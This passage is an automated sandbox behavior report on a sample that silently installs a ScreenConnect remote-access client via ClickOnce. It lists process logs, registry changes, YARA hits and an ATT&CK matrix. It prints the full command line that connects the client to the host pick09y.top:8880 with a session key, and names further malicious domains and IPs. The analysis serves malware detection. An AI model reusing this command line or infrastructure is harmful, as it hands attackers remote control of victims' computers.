                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1BD4 cpuid 0_2_009C1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009C1806
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.970000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7480, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2316, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager34
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Timestomp
                  NTDS51
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551436 Sample: pzPO97QouM.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 57 46 pick09y.top 2->46 48 molatoriism.icu 2->48 50 2 other IPs or domains 2->50 62 Antivirus detection for URL or domain 2->62 64 .NET source code references suspicious native API functions 2->64 66 Detected potential unwanted application 2->66 68 2 other signatures 2->68 9 pzPO97QouM.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        15 svchost.exe 8 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 19 dfsvc.exe 131 110 9->19         started        23 WerFault.exe 19 16 9->23         started        54 pick09y.top 62.182.85.100, 49968, 8880 YANINA-ASUA Ukraine 11->54 72 Reads the Security eventlog 11->72 74 Reads the System eventlog 11->74 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 15->28         started        56 127.0.0.1 unknown unknown 17->56 signatures6 process7 dnsIp8 52 molatoriism.icu 104.21.96.148, 443, 49727, 49748 CLOUDFLARENETUS United States 19->52 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 44 13 other files (none is malicious) 19->44 dropped 30 